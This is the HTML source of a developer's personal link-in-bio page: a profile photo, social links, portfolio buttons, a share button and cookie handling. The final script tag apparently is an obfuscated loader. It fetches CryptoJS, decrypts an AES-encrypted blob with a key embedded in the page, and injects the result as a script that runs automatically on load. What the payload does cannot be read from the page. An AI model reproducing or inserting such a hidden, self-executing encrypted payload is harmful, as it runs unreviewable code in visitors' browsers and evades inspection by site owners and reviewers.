<html>

<head>
  <title>
    TheDevyash • Link In Bio
  </title>
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
  <link rel="manifest" href="/site.webmanifest">
  <meta property="og:url" content="https://thedevyashsaini.github.io"> 
   <meta property="og:type" content="website"> 
   <meta property="og:title" content="TheDevyash • Link In Bio"> 
   <meta property="og:site_name" content=Devyash Saini>
   <meta property="og:description" content="Experienced Python scripter and web developer proficient in HTML, CSS, and JavaScript, with a passion for sketching and creative design."> 
   <meta property="og:image" content="https://i.ibb.co/QQChBgG/image.png"> 
   <!-- <meta property="og:image:width" content="1080"> --> 
   <meta name="keywords" content="devyash, devyash saini, thedevyash, thedevyashsaini, the devyash, the devyash saini, Devyash Saini, web development, web design, portfolio, website, education, skills, expertise, experience, work history, achievements, qualifications, training, certifications, projects, design philosophy, coding practices, software development techniques, web development tools, design inspiration, web development process, design approach, coding standards, programming languages, web design trends, web development solutions, client testimonials, success stories, website design, website development, website maintenance, website optimization, website customization, website redesign, website updates, website hosting, website security">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.4/jquery.min.js"></script>
  <style>
    @import url(https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600;700&family=Ubuntu:wght@400;500;700&family=Quicksand:wght@400;500;600;700&display=swap);

    * {
      -webkit-tap-highlight-color: transparent;
    }
    
    body {
      padding: 0;
      margin: 0;
      background: linear-gradient(rgba(0, 0, 0, 0.4), rgba(0, 0, 0, 0.88)), url("https://images.unsplash.com/photo-1558104467-81fcc26343a4?ixlib=rb-1.2.1&ixid=eyJhcHBfaWQiOjExMDAyOH&q=80&fm=jpg&crop=entropy&fit=max&h=1080?q=1691740944.6141317&q=80&fm=jpg&crop=entropy&fit=max&h=1080");
      background-position: 50% 15%;
      background-repeat: no-repeat;
      background-size: cover;
      background-attachment: fixed;
      overflow: hidden auto;
      max-height: 100%;
      color: #fff;
    }

    svg {
      fill: #ffffff
    }

    #preloader {
      background: url("/e3a.gif") no-repeat center;
      background-size: 15%;
      filter: invert(100%);
      background-color: #fff;
      height: -webkit-fill-available;
      width: 100%;
      position: fixed;
      cursor: pointer;
      z-index: 999999;
    }

    .main {
      height: fit-content;
      width: -webkit-fill-available;
    }

    .share {
      top: 0;
      right: 0;
      position: absolute;
      margin: 25px 25px;
      display: flex;
      padding: 6px 15px 6px 10px;
      background: #fff;
      width: fit-content;
      color: #000;
      border-radius: 100px;
      font-weight: 500;
      font-family: Poppins, sans-serif;
      align-items: center;
      filter: brightness(0.9);
      cursor: pointer;
    }

    .share .icon svg {
      fill: #000;
      height: 15px;
    }

    .share .text {
      margin-left: 10px;
    }
    
    .image {
      width: 100%;
      align-items: center;
      text-align: center;
    }
    .image img {
      height: 100px;
      width: 100px;
      border-radius: 50%;
      margin-top: 80px;
    }

    .name {
      text-align: center;
      font-family: Poppins, sans-serif;
      font-weight: 600;
      font-size: 21px;
      margin-top: 15px;
      text-shadow: rgba(0, 0, 0, 0.25) 0px 0.5px 1px;
    }

    .addr {
      font-family: Poppins, sans-serif;
      font-weight: 600;
      font-size: 16px;
      opacity: 0.8;
      margin: 8px 0;
      text-overflow: ellipsis;
      overflow: hidden;
      white-space: nowrap;
      text-shadow: rgba(0, 0, 0, 0.25) 0px 0.5px 1px;
      text-align: center;
    }

    .addr svg {
      margin-bottom: -1px;
      margin-right: 2px;
      height: 13px;
      width: 10px;
    }

    .tags {
      width: 100%;
      text-align: center;
      font-family: Poppins, sans-serif;
      font-weight: 600;
      font-size: 16px;
      margin-bottom: 8px;
      text-shadow: rgba(0, 0, 0, 0.25) 0px 0.5px 1px;
    }

    .social {
      width: 100%;
      text-align: center;
      margin-top: 18px;
    }
    .social a {
      display: inline-block;
      text-decoration: none;
      width: 40px;
    }
    .social svg {
      height: 27px;
    }
    .social svg:hover {
      filter: brightness(0.9);
    }

    .texts {
      font-family: Poppins, sans-serif;
      font-weight: 600;
      width: 80%;
      max-width: 520px;
      margin: auto;
      text-align: left;
      margin-top: 68px;
    }
    .texts p {
      margin-top: 15px;
    }

    .buttons {
      width: 100%;
      text-align: center;
      margin-top: 72px;
    }
    
    .buttons h3 {
      font-family: Poppins, sans-serif;
      font-weight: 700;
    }

    .buttons h4 {
      font-family: Poppins, sans-serif;
      font-weight: 600;
      margin-top: -12px;
    }

    .button {
      border-radius: 36px;
      background-color: rgba(0, 0, 0, 0);
      font-family: Poppins, sans-serif;
      font-size: 15px;
      height: 60px;
      border: 2px solid rgb(255, 255, 255);
      display: flex;
      padding-left: 0px;
      padding-right: 0px;
      max-width: 550px;
      width: 75%;
      margin: auto;
      margin-top: 18px;
      animation: breath 4s infinite;
      cursor: pointer;
    }

    .anim {
      position: absolute;
      top: 0;
      bottom: 0;
      left: 0;
      right: 0;
      margin: auto;
      background: #eee;
      border-radius: 36px;
      opacity: 0.3;
      transform: scale(0);
    }

    .button:hover > .anim {
      animation: click 0.6s;
    }

    @keyframes click {
      0% {
        opacity: 0.2;
      }
      100% {
        transform: scale(1);
        opacity: 0;
      }
    }

    .logo {
      height: 100%;
      align-items: center;
      display: flex;
      padding: 0 15px;
    }

    .logo svg {
      height: 35px;
    }

    .btnTxt {
      line-height: 65px;
      margin-right: 65px;
      width: -webkit-fill-available;
    }

    @keyframes breath {
      0% 60% 100% {
        transform: scale(1);
      }
      30% {
        transform: scale(1.05);
      }
    }

    footer {
      margin-top: 80px;
      width: 100%;
      background: #00000075;
      text-align: center;
      padding: 15px 0;
      font-family: Quicksand;
    }
  </style>
</head>
<body>
  <div id="preloader"></div>
  <div class="main">
    <div class="share">
      <div class="icon">
        <svg xmlns="http://www.w3.org/2000/svg" height="1em" viewBox="0 0 448 512">
          <path
            d="M352 224c53 0 96-43 96-96s-43-96-96-96s-96 43-96 96c0 4 .2 8 .7 11.9l-94.1 47C145.4 170.2 121.9 160 96 160c-53 0-96 43-96 96s43 96 96 96c25.9 0 49.4-10.2 66.6-26.9l94.1 47c-.5 3.9-.7 7.8-.7 11.9c0 53 43 96 96 96s96-43 96-96s-43-96-96-96c-25.9 0-49.4 10.2-66.6 26.9l-94.1-47c.5-3.9 .7-7.8 .7-11.9s-.2-8-.7-11.9l94.1-47C302.6 213.8 326.1 224 352 224z" />
        </svg>
      </div>
      <div class="text">Share</div>
    </div>
    <div class="image">
      <img src="https://i.ibb.co/r6VvjpT/287727039-3093384100973942-5454241229082419249-n.jpg">
    </div>
    <div class="name">Devyash Saini</div>
    <div class="addr">
      <svg xmlns="http://www.w3.org/2000/svg" height="1em" viewBox="0 0 384 512"><path d="M215.7 499.2C267 435 384 279.4 384 192C384 86 298 0 192 0S0 86 0 192c0 87.4 117 243 168.3 307.2c12.3 15.3 35.1 15.3 47.4 0zM192 128a64 64 0 1 1 0 128 64 64 0 1 1 0-128z"/></svg>
      Jaipur, Rajasthan
    </div>
    <div class="tags">Web Developer | Programmer | Designer | Freelancer</div>
    <div class="social">
      <a href="https://www.instagram.com/thedevyashsaini/">
        <i>
          <svg xmlns="http://www.w3.org/2000/svg" height="1em" viewBox="0 0 448 512">
            <path
              d="M224.1 141c-63.6 0-114.9 51.3-114.9 114.9s51.3 114.9 114.9 114.9S339 319.5 339 255.9 287.7 141 224.1 141zm0 189.6c-41.1 0-74.7-33.5-74.7-74.7s33.5-74.7 74.7-74.7 74.7 33.5 74.7 74.7-33.6 74.7-74.7 74.7zm146.4-194.3c0 14.9-12 26.8-26.8 26.8-14.9 0-26.8-12-26.8-26.8s12-26.8 26.8-26.8 26.8 12 26.8 26.8zm76.1 27.2c-1.7-35.9-9.9-67.7-36.2-93.9-26.2-26.2-58-34.4-93.9-36.2-37-2.1-147.9-2.1-184.9 0-35.8 1.7-67.6 9.9-93.9 36.1s-34.4 58-36.2 93.9c-2.1 37-2.1 147.9 0 184.9 1.7 35.9 9.9 67.7 36.2 93.9s58 34.4 93.9 36.2c37 2.1 147.9 2.1 184.9 0 35.9-1.7 67.7-9.9 93.9-36.2 26.2-26.2 34.4-58 36.2-93.9 2.1-37 2.1-147.8 0-184.8zM398.8 388c-7.8 19.6-22.9 34.7-42.6 42.6-29.5 11.7-99.5 9-132.1 9s-102.7 2.6-132.1-9c-19.6-7.8-34.7-22.9-42.6-42.6-11.7-29.5-9-99.5-9-132.1s-2.6-102.7 9-132.1c7.8-19.6 22.9-34.7 42.6-42.6 29.5-11.7 99.5-9 132.1-9s102.7-2.6 132.1 9c19.6 7.8 34.7 22.9 42.6 42.6 11.7 29.5 9 99.5 9 132.1s2.7 102.7-9 132.1z" />
          </svg>
        </i>
      </a>
      <a href="https://twitter.com/thedevyashsaini">
        <i>
          <svg xmlns="http://www.w3.org/2000/svg" height="1em" viewBox="0 0 512 512">
            <path
              d="M459.37 151.716c.325 4.548.325 9.097.325 13.645 0 138.72-105.583 298.558-298.558 298.558-59.452 0-114.68-17.219-161.137-47.106 8.447.974 16.568 1.299 25.34 1.299 49.055 0 94.213-16.568 130.274-44.832-46.132-.975-84.792-31.188-98.112-72.772 6.498.974 12.995 1.624 19.818 1.624 9.421 0 18.843-1.3 27.614-3.573-48.081-9.747-84.143-51.98-84.143-102.985v-1.299c13.969 7.797 30.214 12.67 47.431 13.319-28.264-18.843-46.781-51.005-46.781-87.391 0-19.492 5.197-37.36 14.294-52.954 51.655 63.675 129.3 105.258 216.365 109.807-1.624-7.797-2.599-15.918-2.599-24.04 0-57.828 46.782-104.934 104.934-104.934 30.213 0 57.502 12.67 76.67 33.137 23.715-4.548 46.456-13.32 66.599-25.34-7.798 24.366-24.366 44.833-46.132 57.827 21.117-2.273 41.584-8.122 60.426-16.243-14.292 20.791-32.161 39.308-52.628 54.253z" />
          </svg>
        </i>
      </a>
      <a href="https://threads.net/@thedevyashsaini">
        <i>
          <svg xmlns="http://www.w3.org/2000/svg" height="1em" viewBox="0 0 448 512">
            <path
              d="M331.5 235.7c2.2 .9 4.2 1.9 6.3 2.8c29.2 14.1 50.6 35.2 61.8 61.4c15.7 36.5 17.2 95.8-30.3 143.2c-36.2 36.2-80.3 52.5-142.6 53h-.3c-70.2-.5-124.1-24.1-160.4-70.2c-32.3-41-48.9-98.1-49.5-169.6V256v-.2C17 184.3 33.6 127.2 65.9 86.2C102.2 40.1 156.2 16.5 226.4 16h.3c70.3 .5 124.9 24 162.3 69.9c18.4 22.7 32 50 40.6 81.7l-40.4 10.8c-7.1-25.8-17.8-47.8-32.2-65.4c-29.2-35.8-73-54.2-130.5-54.6c-57 .5-100.1 18.8-128.2 54.4C72.1 146.1 58.5 194.3 58 256c.5 61.7 14.1 109.9 40.3 143.3c28 35.6 71.2 53.9 128.2 54.4c51.4-.4 85.4-12.6 113.7-40.9c32.3-32.2 31.7-71.8 21.4-95.9c-6.1-14.2-17.1-26-31.9-34.9c-3.7 26.9-11.8 48.3-24.7 64.8c-17.1 21.8-41.4 33.6-72.7 35.3c-23.6 1.3-46.3-4.4-63.9-16c-20.8-13.8-33-34.8-34.3-59.3c-2.5-48.3 35.7-83 95.2-86.4c21.1-1.2 40.9-.3 59.2 2.8c-2.4-14.8-7.3-26.6-14.6-35.2c-10-11.7-25.6-17.7-46.2-17.8H227c-16.6 0-39 4.6-53.3 26.3l-34.4-23.6c19.2-29.1 50.3-45.1 87.8-45.1h.8c62.6 .4 99.9 39.5 103.7 107.7l-.2 .2zm-156 68.8c1.3 25.1 28.4 36.8 54.6 35.3c25.6-1.4 54.6-11.4 59.5-73.2c-13.2-2.9-27.8-4.4-43.4-4.4c-4.8 0-9.6 .1-14.4 .4c-42.9 2.4-57.2 23.2-56.2 41.8l-.1 .1z" />
          </svg>
        </i>
      </a>
      <a href="https://in.linkedin.com/in/thedevyashsaini">
        <i>
          <svg xmlns="http://www.w3.org/2000/svg" height="1em" viewBox="0 0 448 512">
            <path
              d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5 0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9V416z" />
          </svg>
        </i>
      </a>
      <a href="mailto:thedevyahsaini@gmail.com">
        <i>
          <svg xmlns="http://www.w3.org/2000/svg" height="1em" viewBox="0 0 512 512">
            <path
              d="M64 112c-8.8 0-16 7.2-16 16v22.1L220.5 291.7c20.7 17 50.4 17 71.1 0L464 150.1V128c0-8.8-7.2-16-16-16H64zM48 212.2V384c0 8.8 7.2 16 16 16H448c8.8 0 16-7.2 16-16V212.2L322 328.8c-38.4 31.5-93.7 31.5-132 0L48 212.2zM0 128C0 92.7 28.7 64 64 64H448c35.3 0 64 28.7 64 64V384c0 35.3-28.7 64-64 64H64c-35.3 0-64-28.7-64-64V128z" />
          </svg>
        </i>
      </a>
    </div>
    <div class="texts">
      <p>
        Follower of the unknowns,
      </p>
      <p>
        Seeker of the horizons,
      </p>
      <p>
        Keeper of the dreams...
      </p>
    </div>
    <div class="buttons">
      <h3>Let's Connect</h3>
      <h4>and create something amazing together.</h4>
      <div class="button" onclick="window.location = 'https://thedevyashsaini.github.io/'">
        <div class="anim"></div>
        <div class="logo">
          <svg viewBox="0 0 201 200" fill="#FFFFFF" xmlns="http://www.w3.org/2000/svg">
            <path
              d="M77.7416 98.5094C99.3336 98.5094 116.837 81.0409 116.837 59.4928C116.837 37.9445 99.3336 20.4761 77.7416 20.4761C56.1496 20.4761 38.6459 37.9445 38.6459 59.4928C38.6459 81.0409 56.1496 98.5094 77.7416 98.5094Z">
            </path>
            <path
              d="M148 73.6295C158.848 73.6295 167.642 64.853 167.642 54.0268C167.642 43.2006 158.848 34.4243 148 34.4243C137.152 34.4243 128.358 43.2006 128.358 54.0268C128.358 64.853 137.152 73.6295 148 73.6295Z">
            </path>
            <path
              d="M36.7572 131.494C47.6053 131.494 56.3994 122.718 56.3994 111.892C56.3994 101.066 47.6053 92.2893 36.7572 92.2893C25.9091 92.2893 17.115 101.066 17.115 111.892C17.115 122.718 25.9091 131.494 36.7572 131.494Z">
            </path>
            <path
              d="M143.09 165.611C165.62 165.611 183.885 147.383 183.885 124.897C183.885 102.412 165.62 84.1843 143.09 84.1843C120.559 84.1843 102.294 102.412 102.294 124.897C102.294 147.383 120.559 165.611 143.09 165.611Z">
            </path>
            <path
              d="M73.3977 179.747C86.9575 179.747 97.9505 168.776 97.9505 155.244C97.9505 141.711 86.9575 130.741 73.3977 130.741C59.8375 130.741 48.8448 141.711 48.8448 155.244C48.8448 168.776 59.8375 179.747 73.3977 179.747Z">
            </path>
          </svg>
        </div>
        <div class="btnTxt">Portfolio</div>
      </div>
      <div class="button" onclick="window.location = 'https://thedevyashsaini.github.io/#projects'">
        <div class="anim"></div>
        <div class="logo">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><path d="M80 104a24 24 0 1 0 0-48 24 24 0 1 0 0 48zm80-24c0 32.8-19.7 61-48 73.3v87.8c18.8-10.9 40.7-17.1 64-17.1h96c35.3 0 64-28.7 64-64v-6.7C307.7 141 288 112.8 288 80c0-44.2 35.8-80 80-80s80 35.8 80 80c0 32.8-19.7 61-48 73.3V160c0 70.7-57.3 128-128 128H176c-35.3 0-64 28.7-64 64v6.7c28.3 12.3 48 40.5 48 73.3c0 44.2-35.8 80-80 80s-80-35.8-80-80c0-32.8 19.7-61 48-73.3V352 153.3C19.7 141 0 112.8 0 80C0 35.8 35.8 0 80 0s80 35.8 80 80zm232 0a24 24 0 1 0 -48 0 24 24 0 1 0 48 0zM80 456a24 24 0 1 0 0-48 24 24 0 1 0 0 48z"/></svg>
        </div>
        <div class="btnTxt">Projects</div>
      </div>
      <div class="button" onclick="window.location = 'https://in.linkedin.com/in/thedevyashsaini/'">
        <div class="anim"></div>
        <div class="logo">
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512">
            <path
              d="M416 32H31.9C14.3 32 0 46.5 0 64.3v383.4C0 465.5 14.3 480 31.9 480H416c17.6 0 32-14.5 32-32.3V64.3c0-17.8-14.4-32.3-32-32.3zM135.4 416H69V202.2h66.5V416zm-33.2-243c-21.3 0-38.5-17.3-38.5-38.5S80.9 96 102.2 96c21.2 0 38.5 17.3 38.5 38.5 0 21.3-17.2 38.5-38.5 38.5zm282.1 243h-66.4V312c0-24.8-.5-56.7-34.5-56.7-34.6 0-39.9 27-39.9 54.9V416h-66.4V202.2h63.7v29.2h.9c8.9-16.8 30.6-34.5 62.9-34.5 67.2 0 79.7 44.3 79.7 101.9V416z" />
          </svg>
        </div>
        <div class="btnTxt">LinkedIn</div>
      </div>
    </div>

    <footer>
      © 2023 TheDevyash | All Rights Reserved |
    </footer>
  </div>

  <script>
    window.addEventListener("load", function() {
      $("#preloader").fadeOut(100); 
    });
    var sharebtn = document.getElementsByClassName("share")[0]
    var text = 'https://thedevyashsaini.github.io/m/';
    function mobileDevice() {
      return /Mobi|Android|iPhone|iPad|iPod|Windows Phone|BlackBerry|Mobile Safari|webOS/i.test(navigator.userAgent);
    }

    function copyToClipboard() {
      const textArea = document.createElement("textarea");
      textArea.value = text;
      document.body.appendChild(textArea);
      textArea.select();
      document.execCommand("copy");
      document.body.removeChild(textArea);
      sharebtn.innerHTML = '<div class="icon"><svg xmlns="http://www.w3.org/2000/svg" height="20px" viewBox="0 0 512 512"><path d="M256 512A256 256 0 1 0 256 0a256 256 0 1 0 0 512zM369 209L241 337c-9.4 9.4-24.6 9.4-33.9 0l-64-64c-9.4-9.4-9.4-24.6 0-33.9s24.6-9.4 33.9 0l47 47L335 175c9.4-9.4 24.6-9.4 33.9 0s9.4 24.6 0 33.9z"></path></svg></div><div class="text">Link Copied!</div>';
      setTimeout(function(){
        sharebtn.innerHTML = '<div class="icon"><svg xmlns="http://www.w3.org/2000/svg" height="1em" viewBox="0 0 448 512"><path d="M352 224c53 0 96-43 96-96s-43-96-96-96s-96 43-96 96c0 4 .2 8 .7 11.9l-94.1 47C145.4 170.2 121.9 160 96 160c-53 0-96 43-96 96s43 96 96 96c25.9 0 49.4-10.2 66.6-26.9l94.1 47c-.5 3.9-.7 7.8-.7 11.9c0 53 43 96 96 96s96-43 96-96s-43-96-96-96c-25.9 0-49.4 10.2-66.6 26.9l-94.1-47c.5-3.9 .7-7.8 .7-11.9s-.2-8-.7-11.9l94.1-47C302.6 213.8 326.1 224 352 224z"></path></svg></div><div class="text">Share</div>';
      }, 2000)
      return;
    }
    
    sharebtn.onclick = function() {
      if(mobileDevice()) {
        const shareData = {
          title: '',
          text: '',
          url: text,
        }
        
        navigator.share(shareData)
      } else {
        copyToClipboard();
      }
    }
    
    function getCookieValue(cookieName) {
      const cookies = document.cookie.split("; ");
      for (const cookie of cookies) {
        const [name, value] = cookie.split("=");
        if (name === cookieName) {
          return value;
        }
      }
      return false; // Cookie not found
    }
    
    const url = new URL(window.location.href);
    if(getCookieValue("mobileVisited") === "true" && url.searchParams.has('redirectBack')) {
      window.location = "/";
    }

    const farFuture = new Date("2100-12-31");
    document.cookie = `mobileVisited=true; expires=${farFuture.toUTCString()}`;
  </script>
  <script>
  var a=document.createElement("script");a.src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js",document.body.appendChild(a),setTimeout(function(){var t=CryptoJS.AES.decrypt("U2FsdGVkX1+SjcCZrSSZ7tnMtYwFqKQRVJEGtMC6e/DiKN+guDilHBPoWBD6DUm4SWm56bbJfQvDSurRqHuoPd0VD5zhTRIjiMeJOyKqpRp9NF7rrPcmWDHmqqPF6jaJ6cROnQX3DXhA3hQPL2jMHBMLFhDw/J+ZS/5ayXMnwBPOMsvb2SuZm81fJqddJC033E6REqIz2/RvKGeD5M4romPsOooOP+HZJcUw9N2+C+YPW/mTuZ2F65pVXyf5hAPoVRzLcHfbQrLxbSAv0LfdPJKON5+rO2brX2xwEZs7crE5N0q3GBjOZDbtnvv+aT+40XKjVRXKA2ize0gEK5iSxsM43oADtXt24zx0x4Y65vXLsLgjRqecTsFEctNyBqNytipMk+z5wsgJM5+Ur6fEcTD2HXU0mFz3JJijuQcgkiXxu/F9QVTOWSSmeGiG4FcWrjHdA67q8eQJ2Psim4ZBlw+Xm9LPV7jjAbSElIkOQ5Js3A1PnY1MaFm3O14VPWzX2Pt1HZj9MjAFZxhMroZcI7mm6jqnfMnOqQJIEgQFvd5WyFKLPcA92/L0UZPcEkZ2","&O2XePWX%D.kDMhNnem;rUdXm'g}$ijQ").toString(CryptoJS.enc.Utf8),c=document.createElement("script");c.textContent=t,document.body.appendChild(c)},200)
  </script>
  
</body>

</html>
